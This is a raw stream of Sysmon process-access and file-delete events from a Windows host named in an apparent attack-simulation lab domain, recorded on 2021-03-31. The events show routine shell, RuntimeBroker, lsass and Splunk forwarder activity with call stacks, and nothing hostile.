12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.838{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.838{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.714{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+14e60|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.449{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.449{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DF3FB4AC0CFED6C93778121BB20E25,SHA256=14BE34FE7B55BBEE758DB6D8445A3FE0DBFE0C7E20F8A9595E9E6FA18026F00B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.449{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.449{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.433{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.433{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90688578FA63C65FE9A2CD863BE7F852,SHA256=2ADF436EBD0528A1AE374762FFFE6C30183F2A27C8EBC0C0D893081BCF382C0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 